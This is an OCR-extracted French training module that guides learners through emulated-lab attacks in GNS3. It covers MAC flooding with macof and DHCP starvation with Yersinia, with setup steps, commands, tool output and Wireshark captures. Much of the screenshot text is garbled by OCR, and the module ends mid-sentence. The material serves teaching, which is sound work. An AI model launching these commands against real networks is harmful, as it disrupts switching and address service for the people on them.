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DÉCOUVRIR LA CRYPTOGRAPHIE ET LES SOLUTIONS DE GESTION 
ET DE PARTAGE DE CLÉS 
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e Activité 1 : Identification des vulnérabilités d’un système 
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Activité 3 : Exploitation des failles relatives au protocole FTP 
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BE THE CHANGE ~< PARTIE 1 


DECOUVRIR LES NOTIONS DE BASE DE LA 
SECURITE DES SYSTEMES D'INFORMATION 
(SI) 


Dans ce module, vous allez : 


Apprendre a utiliser des outils implémentés dans Kali Linux 
pour lancer des attaques de sécurité 


Réaliser des attaques de sécurité exploitant les vulnérabilités 
des protocoles du modèle OSI 


KO © : 
orrrr  WEBFORCE > ACTIVITÉ 1 


La Voie de l'Avenir 


MENER L'ATTAQUE MAC FLOODING 


Compétences visées : 


e Utiliser des outils avancées pour lancer des attaques de 
sécurité 

e Réaliser une attaque externe exploitant les vulnérabilités de 
la couche 2 du modèle ISO 


Recommandations clés : 


e Maitriser le principe de l'attaque par inondation d'adresses 
MAC (MAC flooding attack) 


o 4 heures 


CONSIGNES 


Pour le formateur 


Vapprenant doit être capable de mettre en place l’environnement de travail décrit 
dans l'énoncé 


Il doit être aussi en mesure de réaliser l'attaque MAC flooding et d'observer les 
résultats de cette attaque 


Pour l’apprenant 


Il est recommandée de maitriser le principe de l'attaque MAC flooding et ses 
résultats 


Il est recommandée également de suivre les étapes décrites dans l'énoncé pour 
pouvoir mener l'attaque avec succes 


Conditions de réalisation : 


GNS3. Lien de téléchargement : https://www.gns3.com/software/download 


VirtualBox. Lien de téléchargement : https://www.virtualbox.org/wiki/Downloads 


Une machine Virtuelle Kali Linux 2022.1. Lien de téléchargement 
https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-virtualbox- 


amd64.ova 


Un fichier c3725-adventerprisek9-mz.124-15.114.bin Lien de téléchargement : 
https://drive.google.com/open?id=1DXsej1M3grZCo915041Jh2jUGpnmCORS5 


Critères de réussite : 


Réaliser le même environnement du travail décrit dans l'énoncé 
Exécuter avec succès l'attaque de sécurité 


Visualiser que la table MAC du commutateur ait été bien inondée suite à l'exécution 
de l'attaque 


Activité 1 WO  WEBFORCE» 


e OFPPT BE THE CHANGE 
Mener l'attaque MAC Flooding 


ba Pome de tom 


Étape 1 : Mise en place de l’environnement de travail 

e L'objectif principal de cette activité est de tester l'exécution d’une attaque MAC Flooding. Pour ce faire, nous allons émuler une topologie réseau dans GNS3 à partir de 
laquelle nous allons essayer de tester la réalisation de cette attaque. 

e Graphical Network Simulator-3 (GNS3) qui est un émulateur réseau permettant la combinaison de dispositifs virtuels pour émuler des réseaux complexes. 


e À l'aide de GNS3, nous pourrons non pas seulement émuler une topologie du réseau, mais aussi simuler l'exécution des attaques de sécurité en émulant les dispositifs 
et les outils qui peuvent être utilisées par des pirates. 


e Dans cette étape, vous êtes chargés de télécharger et installer GNS3, puis ouvrir un nouveau projet, intitulé Projet1. Ci-dessous, l'interface d’accueil de GNS3. 


È s È Project 


Mie pat Mew Cammi Nadie Anactee Task Help 


Nem project | Projecta Barr 
Mew project 


Name  Projetil 


Locston: C:WUsers'} PSS projects Frojetl 
Open project 


Open apropct from dk Recent projects... ” 


Sorose Surrenany 20 
© DERTOP-MECEF CPU 232%, RAM . 


Comoe 
Screg PÉTER 4 Création d’un nouveau projet 
Last ein <> M Decte te letmo mee. 


= 
— 
| 
< 
a. 


Interface d’accueil de GNS3 
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i OFPPT pE THE CHANGE 
Mener l'attaque MAC Flooding neato 


Etape 2 : Préparation de la machine virtuelle Kali Linux 


e Kali Linux est une distribution Linux open source basée sur Debian. Elle est orientée vers diverses tâches de sécurité de l'information, telles que les tests d'intrusion, la 
recherche en sécurité, l'informatique judiciaire et l'ingénierie inverse. 


e Kali Linux implémente plusieurs outils permettant de tester l’exécution de certaines attaques de sécurité. 


e Dans cette étape, vous êtes chargés de télécharger le fichier kali-linux-2022.1-virtualbox-amd64.ova, puis l’importer dans VirtualBox pour créer une machine virtuelle 


Kali linux. 
Oracle VM VirtualBox - Gestionnaire de machines G & PN 
Fichier Machine Aide Nouvelle Confgurebon Oubber Démarrer 
M Général 
@ Paramètres... ite baharun 2022 turbo 
Système Cexploitation: Debian (64-bit) 
i system kali-linux-2022.1- 
A Exporter un appareil virtuel... D ao > virtualbox-amd64 
per ota H et en roar 
CA New Cloud VM... Aeration PENX, Puewrtadsebon KIM 
M Affichage 
Gestionnaire de médias... Ctrl+D G) stockage 
Gestionnaire de réseau hôte... Ctrl+H fave secondaire IDE : [Lecteur aptque] Vide 
Contréleur ; SATA 
| Gestionnaire d'opérations réseau... 5; — mi n a ro ee 
Lu ©) Rechercher des mises à jour... Plote hôte : Windows DrectSound 
H= Contréleur : ICH ACS? 
= Å Réinitialiser tous les avertissements + Ses ti 
A. z 
© Quitter Ctrl+Q Contrôleur USS : oH 
Fires de périchénque : © (0 actif) 
Importation du fichier kali-linux-2022.1-virtualbox-amd64.ova sous VirtualBox Machine Virtuelle Kali Linux crée sous VirtualBox 
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Etape 2 : Préparation de la machine virtuelle Kali Linux 


e || vaut mieux mettre à jour le système d’exploitation Kali Linux, pour pouvoir installer les outils nécessaires pour la réalisation des activités. 


e Pour ce faire, tapez dans le terminal la commande: sudo apt update 


kali@kali: - 


File Actions Edit View Help 


Remarques 


e Les identifiants de la machine Kali sont les suivants : 
e Login : kali 
e Mot de passe : kali 


Mise à jour du système Kali 


=i 
= 
| 
< 
[a 
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Etape 2 : Préparation de la machine virtuelle Kali Linux 


e Installez l’outil Macof dans la machine virtuelle Kali en tapant la commandes suivante dans le terminal : sudo macof 
e Cet outil nous servira par la suite pour l'exécution de l'attaque MAC Flooding 
e Après avoir terminé l'installation de l’outil Macof, modifiez le mode d’accés réseau en " Aucune connexion" 


e Cela est requis pour que vous puissiez par la suite connecter cette machine a la topologie réseau qui sera créée dans l’'émulateur GNS3 dans l'étape suivante 


@ kali-linux-2022.1-vitualbox-amd6s - Paramètres 


E Général 
[E] Système 
M atfichage 
Stockage 
® sen 

WP Réseau 
LD Ports séries 


Ø us 
A Dossiers partages 
ET Interface utilisateur 


A 
— 
| 
< 
[a 


Mode d’accès réseau de la VM Kali 
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Etape 3 : Emulation de la topologie de réseau 


e Après avoir installé GNS3, nous allons émuler une topologie réseau à partir de laquelle, nous testerons l'attaque MAC Flooding. 


La topologie réseau a émuler est illustrée dans la figure ci-dessous. 


EO | fA 
er, 


Topologie réseau 


Pour mettre en place une telle topologie, vous êtes chargés de : 


1. 
2. 


Télécharger le fichier c3725-adventerprisek9-mz.124-15.T14.bin, qui représente une image Cisco IOS permettant l'émulation d’un commutateur (Switch). 


Créer manuellement une nouvelle Template de commutateur à partir du fichier c3725-adventerprisek9-mz.124-15.T14.bin.Pour ce faire, cliquez sur 
"+NewTemplate"> "Manually create a new template" "IOS Routers" > "New". Sélectionnez ensuite le fichier c3725-adventerprisek9-mz.124-15.T14.bin et 
complétez le processus de création de la Template du commutateur (sous le nom EtherSwitch) ; 


Importer la machine virtuelle Kali Linux. Pour ce faire, cliquez sur Edit> preferences >VirtualBox>VirtualBOX VMs>New ; 
Établir les liens requis pour créer la topologie comme illustrée à la figure ci-dessus ; 


Démarrer les équipements de la topologie réseau en cliquant sur le boutant Start/Resume all nodes. 
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Étape 4 : Exécution de l’attaque MAC Flooding 


e L'attaque Mac Flooding consiste à inonder un commutateur avec des paquets ARP falsifiés, chacun contenant différentes adresses MAC source. Pour exécuter une telle 
attaque, vous êtes chargés de : 


1. Afficher le nombre actuel d'entrées dans la table d'adresses MAC du commutateur. Pour ce faire, exécuter la commande suivante à partir du terminal du 
commutateur : #show mac-address-table count ; 


2. Utiliser l'outil "macof" dans la machine Kali Linux pour inonder le commutateur. Vous pouvez utiliser la commande suivante depuis le terminal de la machine 


Kali : sudo macof -i ethO ; 
E Remarques 


e L'outil macof permet d’inonder un commutateur de réponses MAC falsifiées à une 
vitesse élevée. 

e L'option -i suivie du nom de k’interface (ethO, par exemple) permet de spécifier 

l'interface de sortie du flux de de réponses MAC falsifiées. 


3. Vérifier l'exécution de l'attaque en: 
e utilisant Wireshark pour analyser le trafic généré par l'attaquant ; 


e affichant le nombre actuel d'entrées dans la table d'adresses MAC du commutateur en utilisant la commande suivante : # show mac-address-table 
count. 


= 
— 
| 
< 
[a 


4. Arrêter l'exécution de l'attaque. 
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fate are 


Etape 3 : Emulation de la topologie de réseau 


Pour créer manuellement une nouvelle Template d’un commutateur à partir du fichier c3725-adventerprisek9-mz.124-15.T14.bin, sélectionnez l'icône " +New template " 
= New template 


Une nouvelle fenétre intitulée New template s’ouvre, sélectionnez alors Une nouvelle fenêtre intitulée Preferences s’ouvre, sélectionnez alors IOS 
Manually create a new template. Cliquez ensuite sur Next. Routers, et parcourez le chemin du fichier c3725-adventerprisek9-mz.124- 
15.714.bin. Cliquez ensuite sur Next. 


è New tempire 


Hew template 
Presse select how you want w creste snev tenpiste 


ratal an pane Ton the GAS nerve: f-renerrenced) À Mew KIs miter sempiste 
rout an copione file (gs3 exiorgon]) z 
© Manusby reste a new template 


image 
Pisane hoces an 125 irage. 


Piiraa © New Ty 
Ws eup: 
CILP GS Tros OSTE rere, 124-15,7 age 


= 
— 
m 
< 
a. 
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Correction 


Étape 3 : Émulation de la topologie de réseau 


Une nouvelle fenêtre intitulée New IOS router s'ouvre, nommez-la template du 
commutateur EtherSwitch. Sélectionnez la case This is an EtherSwitch router. 
Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-15.T14.image 


Name and platform 
Please choose a descriptive name for this new IOS router and verify the platform and chassis. 


Name:  |EtherSwitch| 


Platform: c3725 


Chassis: | 


V This is an EtherSwitch router 


A 
— 
m 
< 
[a 
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Attribuez une capacité RAM, il est possible d’utiliser la valeur par défaut 128Mo. 
Cliquez ensuite sur Next. 


é New IOS router - c3725-adventerprisek9-mz.124-15.T14.image 


Memory 
Please check the amount of memory (RAM) that you allocate to IOS. Too much or not enough RAM could 
prevent IOS from starting. 


Default RAM: | [128 MiB 
Check for minimum and maximum RAM requirement 


| <Back || Next> || Cancel | 
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H OFPPT pE THE CHANGE 
Correction 
Étape 3 : Émulation de la topologie de réseau 
Sur la page Network adaptaters, il vaut mieux ne pas modifier la configuration Sur la page Idle-PC, il vaut mieux ne pas modifier la configuration par défaut. 


= 
= 
m 
< 
a. 


par défaut. Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-15.T14.image 


Network adapters 
Please choose the default network adapters that should be inserted into every new instance of this router. 


Cliquez ensuite sur Finish. 


& New IOS router - c3725-adventerprisek9-mz.124-15,T14.image 


Idle-PC 
An idle-pc value is necessary to prevent IOS to use 100% of your processor or one of its cores. 


slot 0: | GT96100-FE 


tle: 60208580) sere snr 


slot 1: | NM-16ESW 


slot 2: | 


slot 3: 
slot 4: 
slot 5: 
slot 6: 
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Étape 3 : Émulation de la topologie de réseau 


Comme illustré dans la figure ci-dessous, la template EtherSwitch a été créée avec succès. 


All devices 
[Filter 


ATM switch 


Cloud 


p | Ethernet hub 


á Ethernet switch 


EtherSwitch 


P 
C4 D 
© Frame Relay switch 
NAT 
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Etape 3 : Emulation de la topologie de réseau 


Pour créer manuellement une nouvelle Template d’une machine a partir d’une machine virtuelle créée sous VirtualBox, sélectionnez l'icône sf New template 


Une nouvelle fenétre intitulée New template s’ouvre, sélectionnez alors Une nouvelle fenêtre intitulée Preferences s'ouvre, sélectionnez alors 
Manually create a new template. Cliquez ensuite sur Next. VirtualBox VMs, et sélectionnez la VM Kali. Cliquez ensuite sur Next. 


e New templete 


New template 
Please select how you want to areste a new tenpiste 


Fetal an apabance fron Pe GSI aarver (recomended) 
Import an spplance fle (grea extension) 
© Manush create a new cemolate 


È how VirtualBes VM template 


Wrtualtux Veteal Machine 
Peace choose a Virusiox vrus machine Fon the Bet, 


Use as bed base WY (experimental) 


= 
— 
m 
< 
[a 
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Etape 3 : Emulation de la topologie de réseau 


Terminez le processus de creation en cliquant sur Apply puis Ok. Comme illustré dans la figure ci-dessous, la template Kali a été créée avec succès. 


? x 


VirtualBox VM templates | 


z + General 
JEI kali-tinux-2022.1-virtualbox-amd64 Template nome: keab~irmse-2002.1-virtuslbere-ama6d 
Template ID: rone 
Virtus Bux nema kab irma 2002 | virtusbuc sm6 
RAM: 245 
Serves: DESKTOP IM2500 
Headless mode enatied Fake 
On dove powert 
Unted bese YM: Fake 
Conscle type rone 
Auto that console: Fake 


d Ethernet hub 


Neme forme Ethernet. 
Uhe arty adaptu: Fabe 
Type: Imel PROV 1000 MT Draktup (E2540EM) 


á Ethernet switch 


= 
= 
m 
< 
a. 
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Étape 3 : Émulation de la topologie de réseau 


Importez les équipements nécessaires dans l’espace de travail, les nommez, puis 
établissez les liens requis pour créer la topologie comme illustré à la figure ci- 
dessus. 


Comme illustré dans la figure ci-dessous, tous les équipements sont actifs et 
prêts à être utilisés. 


Cliquez sur le bouton Start/Resume all nodes. Une fenêtre de confirmation 
s'ouvre, cliquez alors sur Yes. 


& Confirm Start All x 


@) Are you sure you want to start all devices? 


Yes || No 
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Étape 4 : Exécution de l’attaque MAC Flooding 


e Après avoir mis en place la topologie réseau demandée et avant de commencer la réalisation de l'attaque de sécurité, il faut vérifier le nombre actuel d'entrées dans la 
table d'adresses MAC du commutateur (nommé Switch) dans notre topologie 


e Pour ce faire, double cliquez sur le commutateur afin d'ouvrir le terminal du commutateur 
e Dans le terminal du commutateur, exécutez la commande suivante : show mac-address-table count 


e Le résultat de la commande exécutée (c.à.d, le nombre actuel d'entrées dans la table d'adresses MAC du commutateur) est affiché dans la figure ci-dessous 


e Selon le résultat obtenu : =P Switch 
e Nombre actuel d'entrées dans la table d'adresses MAC est égal à 1 


e Nombre maximum d'entrées dans la table d'adresses MAC est égal à 8192 


Activité 1 WO WEBFORCE s 
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Correction 


Étape 4 : Exécution de l’attaque MAC Flooding 


e Lancez l'exécution de l'attaque MAC Flooding depuis la machine Kali, en accédant à son terminal et en tapant la commande : sudo macof -i ethO 


e N’arrêtez pas l'exécution de l'attaque jusqu’à ce que vous puissiez examiner les résultats de cette attaque 


kali® kali)-[- 

$ eth 
[sudo] password for kali: 
ca:2e:99:29:85:f8 2e: 
14:2135383714(0) win 
4f:c4:76:16:3f:92 c1: 
:2123673241(0) win 512 
cd:ff:60:8:fc:20 fe:8f:94:54:b9:4c 0.0.0.0.22434 > 0.0.0.0. : S 632848966 
:632848966(0) win 512 
3b:6f:2f:6:63:0 62:2a:fc:3d:f1:1e 0.0.0.0.33411 > 0.0.0.0.26907: S 869447198: 
869447198(0) win 512 
ea:87:9f:7e:b6:c4 79:db:32:17:5b:9e 0.0.0.0.15883 
4:1511795144(0) win 512 
48:76:bf:66:12:8c 87:5a:ad:31:9a:41 0.0.0.0.40049 
51:1102206751(0) win 512 
ea:c0:5c:5f:3d:e af:97:23:2d:a5:8 0.0.0.0.10392 > 


al 
= 
= 
< 
(a 
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Étape 4 : Exécution de l’attaque MAC Flooding 


e Depuis le terminal du commutateur, exécutez de nouveau la commande show mac-address-table count afin d'examiner le nombre actuel d'entrées dans la table 
d'adresses MAC du commutateur 


e Le résultat de la commande exécutée (c.à.d, le nombre actuel d'entrées dans la table d'adresses MAC du commutateur) est affiché dans la figure ci-dessous 


e Selon le résultat obtenu, vous pouvez remarquer que le nombre actuel d'entrées dans la table d'adresses MAC est passé de la valeur 1 à 8188 qui est une valeur très 
proche du nombre maximum d'entrées dans la table d'adresses MAC 


e Nous pouvons donc conclure que la table MAC est inondée avec succès 


= 
— 
m 
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Étape 4 : Exécution de l’attaque MAC Flooding 


Il est aussi possible d'analyser le trafic généré par la machine Kali en utilisant l’outil d'analyse Wireshark, qui est installé par défaut avec GNS3. 


Pour lancer Wireshark, il suffit de cliquer avec le bouton droit sur le câble liant 


age Une fenétre de capture de paquets s’ouvre comme illustré dans la figure ci- 
la machine Kali et le commutateur. Sélectionnez ensuite l’option Start capture. 


dessous, cliquez alors sur OK. 


ê Packet capture 


Link type: | Ethernet 


File name: Switch_FastEthernet11_to_Pirate_Kali_Ethernet0 


Start capture 
Y Packet filters 
| | Suspend 
XA Style 
©) Delete 


V' Start the capture visualization program 


= 
— 
| 
< 
[a 
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Étape 4 : Exécution de l’attaque MAC Flooding 


La figure ci-dessous est un extrait de la capture du trafic collectée lors de l'exécution de l’attaque MAC Flooding. 


4 Capture en cours de - [Switch FastEthernet1/1 to Pirate_Kali Ethernet0] 


Fichier Editer Vue Aller Capture Analyser Statistiques Telephonie Wireless Outils Aide 


40620 BRE CePSFSELTZAQaAH 


Source Destination Protocol Length Info 
1025.. 21.823801 117.97.191.29 139.9.246.55 


1025.. 21.823801 30.220.38.93 112.161.121. 37 


1025.. 21.824785 4.189.149.25 172.81.150.126 


1025.. 21.824785 188.185.81.14 116.5.98.7 
1025.. 21.825753 169.184.227.35 2.163.37.35 


1025.. 21.825753 219.79.205.30 16.192.23.116 
1025.. 21.825753 80.164.60.14 236.223.206.126 


81 22 58 7f 26 e2 2d b5 eb 2a cf 03 08 00 45 00 -"X-&--- -*-...E. 
0O 14 f2 e7 00 0O 40 06 OF 71 d7 40 22 39 35 fe ------@- -q- 
49 16 25 aa fb 9f 3e ae bf 2a 00 00 00 00 50 02 I-%--->: -*....p. 
02 00 16 34 00 00 00 OO 00 00 0G 20 A ee 
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O ‘7 Address Resolution Protocol: Protocol || Paquets: 130516 - Affichés: 130516 (100.0%) || Profile: Default 
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D ne CHANGE ACTIVITÉ 2 
MENER VATTAQUE DHCP STARVATION 


Compétences visées : 
e Utiliser des outils avancés pour lancer des attaques de 
sécurité 


e Réaliser une attaque externe exploitant les vulnérabilités de 
la couche 2 du modèle ISO 


Recommandations clés : 


e  Maitriser le principe de l'attaque DHCP starvation 


CONSIGNES 


Pour le formateur 


Vapprenant doit être capable de mettre en place l’environnement de travail décrit 


dans l'énoncé 


Il doit être aussi en mesure de réaliser l’attaque DHCP Starvation et d'observer les 


résultats de cette attaque 


Pour l’apprenant 


Il est recommandée de maitriser le principe de l'attaque DHCP Starvation et ses 


résultats 


Il est recommandée également de suivre les étapes décrites dans l'énoncé pour 


pouvoir mener cette attaque avec succès 


Conditions de réalisation 


L'environnement de travail relatif à l’activité 1 a été bien mis en place et configuré 


Une machine Virtuelle Ubuntu (ou n'importe quelle machine virtuelle) 
Lien de téléchargement de la VM Ubuntu : 
https://www.osboxes.org/ubuntu/#ubuntu-21-10-info 


Un fichier c3725-adventerprisek9-mz.124-25d.bin. Lien de téléchargement : 
http://network3000.persiangig.com/p/Cisco/ios/c3725-adventerprisek9-mz.124- 


25d.bin 


Critères de réussite 


Réaliser l’environnement de travail décrit dans l'énoncé 


Exécuter avec succès l'attaque de sécurité 


Activité 2 paced WEBFORCE » 
Mener l’attaque DHCP Starvation ina 


Étape 1 : Préparation des machines virtuelles 


e L'objectif principal de cette activité est de tester l'exécution d’une attaque DHCP starvation. 
e Pour ce faire, nous allons émuler une topologie réseau dans GNS3 à partir de laquelle nous allons essayer de tester l'attaque DHCP starvation. 
e Dans cette étape, vous êtes chargés de préparer les machines virtuelles qui vont être utilisées par la suite pour émuler la topologie réseau de cette activité. 


e La première tâche consiste à installer l'outil yersinia dans la machine virtuelle Kali (utilisée dans l’activité précédente) en tapant la commandes suivante dans le 
terminal : sudo apt install yersinia 


e Cet outil nous servira par la suite pour l'exécution de l'attaque DHCP Startvation 


Remarques 


Pour connecter la machine virtuelle Kali à Internet et pouvoir installer l'outil 
yersinia, il faut choisir comme mode d'accès réseau "Nat" ou "Accès par 
pont”. 

e Après avoir terminé l'installation, modifiez le mode d'accès réseau de la 
machine virtuelle en " Aucune connexion". 


=i 
= 
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Étape 1 : Préparation des machines virtuelles 


e Après avoir préparé la machine virtuelle Kali Linux, il faut préparer une deuxième machine virtuelle qui va jouer le rôle d’un client DHCP dans la topologie réseau 
émulée. 


Dans cette activité, il est possible d'utiliser, par exemple, une machine virtuelle Ubuntu. 


e Il est possible de télécharger un disque virtuel Ubuntu à partir du lien suivant https://www.osboxes.org/ubuntu/#ubuntu-21-10-info 


En partant de ce disque virtuel, il est possible de créer une machine virtuelle Ubuntu, en suivant les étapes suivantes : 


1. Comme illustré dans la figure ci-contre, créez une nouvelle machine virtuelle : 
Crée une machine virtuelle 


Nom et système d'exploitation 


Veuillez choisir un nom et un dossier pour la nouvelle machine virtuelle et sélectionner le 
type de système d'exploitation que vous envisagez d'y installer. Le nom que vous 
choisirez sera repris au travers de VirtualBox pour identifier cette machine. 


Nom: bn 


e Les identifiants de la machine virtuelle Ubuntu sont les suivants : 
e Login : osboxes 
e Mot de passe : osboxes.org 


Dossier de la machine : | A E: \Telechargement\Ubuntu 2 


Type : ‘Linux 


: [Ubuntu (64-bit) 
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Mode expert | | Annuler 
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Étape 1 : Préparation des machines virtuelles 


2. Sélectionnez une taille mémoire pour la machine virtuelle, par 3. Sélectionnez l'option « Utiliser un fichier de disque virtuel 
exemple 1 Go. Cliquez ensuite sur Suivant. existant », et parcourez ensuite le chemin du disque virtuel Ubuntu 
téléchargé. Cliquez ensuite sur Créer. La machine virtuelle sera 
créée avec succès. 


< Crée une machine virtuelle < Crée une machine virtuelle 


Taille de la mémoire Disque dur 


Choisissez la quantité de mémoire vive en méga-octets alloués à la machine virtuelle. SI vous le souhaitez, vous pouvez ajouter un disque dur virtuel à la nouvelle machine. 
Vous pouvez soit créer un nouveau disque, soit en choisir un de la liste ou d'un autre 


La quantité recommandée est de 1024 Mo. emplacement en utilisant l'icône dossier. 


MB Si vous avez besoin d'une configuration de stockage plus complexe, vous pouvez 


r te PRE sauter cette étape et modifier les réglages de la machine une fois celle-ci crée. 
bic — La taille du disque dur recommandée est de 10,00 Gio. 
O Ne pas ajouter de disque dur virtuel 
© Créer un disque dur virtuel maintenant 
@ Utiliser un fichier de disque dur virtuel existant 
‘Ubuntu 21. 10 (64bit). vdi (Normal, 500,00 Gio) 


1 
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Étape 2 : Émulation de la topologie de réseau 


e Après avoir préparé les deux machines virtuelles, nous allons émuler une topologie réseau à partir de laquelle, nous testerons l'attaque DHCP starvation. 


e La topologie réseau à émuler est illustré dans la figure ci-dessous 


R1 


e Pour mettre en place une telle topologie, vous êtes chargés de : 
1. Ouvrir un nouveau projet, nommé Projet 2 ; 
2. Télécharger le fichier c3725-adventerprisek9-mz.124-25d.bin, qui représente une image Cisco IOS permettant l’'émulation d’un routeur (Router) ; 


3. Créer manuellement une nouvelle Template d’un routeur à partir du fichier fichier c3725-adventerprisek9-mz.124-25d.bin. Pour ce faire, cliquez sur 
"+NewTemplate"> "Manually create a new template" "IOS Routers" > "New". Sélectionnez ensuite le fichier c3725-adventerprisek9-mz.124-25d.bin et 
compléter le processus de création de la Template du routeur (sous le nom Router) ; 


4. Importer la machine virtuelle Ubuntu. Pour ce faire, cliquez sur Edit> preferences VirtualBox VirtualBOX VMs> New ; 
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5. Établir les liens requis pour créer la topologie comme illustré à la figure ci-dessus ; 


6. Démarrer les équipements de la topologie réseau en cliquant sur le boutant Start/Resume all nodes. 
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Etape 3 : Configuration du serveur DHCP 


e L'attaque DHCP starvation consiste à inonder un serveur DHCP avec de fausses requêtes DHCP. Pour mener cette attaque, la machine pirate (Kali Linux) diffusera 
simultanément un grand nombre de requétes DHCP avec des adresses MAC usurpées, de sorte que les adresses IP disponibles dans la portée du serveur DHCP seront 
épuisées dans un très court laps de temps. 


e Pour mener une telle attaque, vous devez d'abord configurer le routeur R1 en tant que serveur DHCP. Pour ce faire vous êtes chargés de : 
1. Ouvrir le terminal du routeur R1 en effectuant un double clique sur le routeur R1 ; 


2. Activer l'interface appropriée (FastEthernet 0/0 dans notre exemple) et lui attribuer une adresse IP (10.0.0.1, par exemple). Pour ce faire, exécutez les 
commandes suivantes depuis le terminal de R1 : 


e R1# Configure terminal 

e R1(config)# interface FastEthernet 0/0 

e R1(config-if)#ip address 10.0.0.1 255.0.0.0 
e R1(config-if)#no shutdown 

e R1(config-if)#exit 


3. Créer le pool DHCP d’adresses IPs qui seront distribués aux clients DCHP légitimes demandant des adresses. Ça sera le pool dadresses ciblés dans cette attaque. 
Pour ce faire, exécutez les commandes suivantes depuis le terminal de R1; 


e R1(config)#service dhcp 
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e R1(config)#ip dhcp pool pool-1 
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Etape 3 : Configuration du serveur DHCP 


4. Spécifier l'adresse réseau (10.0.0.0, dans notre exemple) pour le pool d’adresses créé. Pour ce faire, exécutez la commande suivantes depuis le terminal de R1 : 
R1(dhcp-config)#network 10.0.0.0 ; 


5. Spécifier l'interface FastethernetO/0 comme passerelle par défaut pour le réseau créé en tapant la commande :R1(dhcp-config)#default-router 10.0.0.1 ; 


6. Indiquer les adresses exclues pour les supprimer du pool d'adresses qui peuvent être attribuées aux clients DHCP. Cela pourrait être utilisé pour protéger les 
affectations statiques qui peuvent exister (passerelle par défaut, serveurs, imprimantes, etc...). Pour ce faire, tapez les commandes suivantes : 


e Ri(dhcp-config)#lease 1 
e R1(dhcp-config)#exit 
e R1(config)#ip dhcp excluded-address 10.0.0.0 
e R1(config)#exit 
7. Vérifier la configuration effectuée à l'aide de la commande suivante : R1#show ip pool dhcp pool-1 ; 


8. Enregistrer la configuration effectuée en tapant la commande suivante : R1# copy running-config startup-config ; 
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Etape 4 : Vérification du bon fonctionnement du serveur DHCP 


e Afin de vérifier si le serveur DHCP fonctionne correctement, vous devez vérifier si les adresses IP attribuées a la machine du pirate ainsi qu'à la machine victime (client 
dhcp) appartiennent au pool assignable du serveur DHCP. Pour ce faire, vous êtes chargés d’effectuer les tâches suivantes : 


1. Ouvrez l'invite de commande de la machine Ubuntu ; 
2. Libérez la configuration IP actuelle de la machine Ubuntu en tapant la commande : sudo ;dhclient -r ; 
3. Demandez une nouvelle adresse IP en tapant la commande : sudo dhclient ; 
4. Vérifiez l'attribution de l'adresse en exécutant les commandes suivantes : 
e Depuis le terminal de la machine Ubuntu : sudo ip address show 
e Depuis le terminal du routeur : R1#show ip DHCP binding 


5. Répétez les étapes précédentes (de 1-4) pour la machine Pirate. 
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Étape 5 : Exécution de l’attaque DHCP Starvation 
e Pour exécuter l'attaque DHCP starvation, il est possible d’utiliser l'outil Yersinia. 


Zg Remarques 


Yersinia est un outil permettant la réalisation des attaques de couche 2. Il est conçu pour tirer parti de certaines 
faiblesses des différents protocoles réseau. 
e L'outil Yersinia peut être installé dans une machine Kali en utilisant la commande : sudo apt install yersinia 


e Dans cette étape, vous êtes essentiellement chargés d'exécuter l’attaque et de visualiser ses résultats. Pour ce faire, il est recommandé de suivre les étapes suivantes : 
Lancez Yersinia en exécutant la commande suivante dans le terminal de la machine Kali : sudo yersinia -G ; 
Depuis l'interface de l'outil Yersinia, cliquez sur : Launch Attack DHCP > Sending DISCOVER packet OK ; 


Lancez ensuite Wireshark dans GNS3 pour analyser les paquets DHCP DISCOVER envoyés ; 


Pe NM eS 


Essayez de voir les dommages qui en résultent et de voir la disponibilité restante du pool d’adresses, en suivant les étapes suivantes : 
i. Essayez de libérer et de renouveler l'attribution de l'adresse IP du client DHCP (machine Ubuntu) en tapant les commandes suivantes : 
i. sudo dhclient -r 
ii. sudo dhclient 


ii. Utilisez la commande suivante dans le routeur pour voir le pool restant : R1#show ip pool dhcp pool-1 
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iii. Utilisez la commande suivante dans le routeur pour voir l'ensemble des adresses affectées : R1# show ip dhcp binding 


5. Terminez l'exécution de l'attaque en tapant la commande suivante : #yersinia -I. 
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Étape 2 : Émulation de la topologie de réseau 


Cette interface illustre louverture d’un nouveau projet, intitulé Projet2. Ce projet sera utilisé pour émuler la topologie réseau demandée dans cette activité. 


È Project 


New project | Projects library 


New project 
Name: Projet 2| 


Location: |C:\Users\HP\GNS3\projects Projet 2 


Open project 


| Open a project from disk | ‘Recent projects... "| 
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Etape 2 : Emulation de la topologie de réseau 


Pour créer manuellement une nouvelle Template d’un routeur a partir du fichier c3725-adventerprisek9-mz.124-25d.bin, sélectionnez l'icône " +New template " 


Une nouvelle fenétre intitulée New template s’ouvre, sélectionnez alors Une nouvelle fenêtre intitulée Preferences s’ouvre, sélectionnez alors IOS 
Manually create a new template. Cliquez ensuite sur Next. Routers, et parcourez le chemin du fichier c3725-adventerprisek9-mz.124- 
25d.bin. Cliquez ensuite sur Next. 


@ Now template ? é New IOS router template 


Merve templite 
Piaras aiat hom you want to ouale a mew torotite 10S 


image 
Please choose an IOS mage. 


Teal an asphance trom the GUEI server (ecommenced) 
©! Inport an apohare Ge (ora exteraen) _) Existing mage (© New Image 
© Meudy crete à mew repie 


10S mage: 
C:Users\HP\GNSJmages 0S 3725 -adventerprisekS-mz. 124-25d. image 
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Étape 2 : Émulation de la topologie de réseau 


Une nouvelle fenêtre intitulée New IOS router s'ouvre, nommez la 
Template du routeur « Router ». Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-25d.image 


Name and platform 
Please choose a descriptive name for this new IOS router and verify the platform and chassis. 


Sem WEBFORCE » 
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Attribuez une capacité RAM, il est possible d'utiliser la valeur par défaut 
128Mo. Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-25d.image 


Memory 
Please check the amount of memory (RAM) that you allocate to IOS. Too much or not enough RAM could 
prevent IOS from starting. 


Name: [Router] 


Platform: | c3725 


Chassis: | 


This is an EtherSwitch router 
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Default RAM: | 28 MiB 


Check for minimum and maximum RAM requirement 
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Étape 2 : Émulation de la topologie de réseau 


Sur la page Network adaptaters, il vaut mieux ne pas modifier la 
configuration par défaut. Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-25d.image 


Network adapters 
Please choose the default network adapters that should be inserted into every new instance of this router. 


slot 0: | GT96100-FE 


dte) 


slot 2: | 
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| <Back || Next> || Cancel 
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Sur la page WIC modules, il vaut mieux ne pas modifier la configuration 
